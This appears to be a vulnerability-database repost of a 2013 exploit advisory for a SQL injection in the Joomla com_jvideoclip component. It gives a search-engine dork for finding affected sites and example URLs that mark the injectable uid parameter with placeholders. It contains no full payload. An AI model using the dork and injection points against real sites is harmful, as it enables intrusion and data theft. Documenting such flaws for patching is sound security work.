Joomla JVideoClip Blind SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044399 漏洞类型
发布时间 2013-09-24 更新时间 2013-09-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090161
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================

Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog			: http://sixp4ck3r.blogspot.com/
Credits		    : To my love!
Dork	       	: inurl:com_jvideoclip

---------------------------------------------------------------------------

[Exploting..Bug..Demo..]

http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6

[Blind SQL Injection]
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[bSQLi]&Itemid=6

---------------------------------------------------------------------------

SixP4ck3r from Bolivia
___EOF____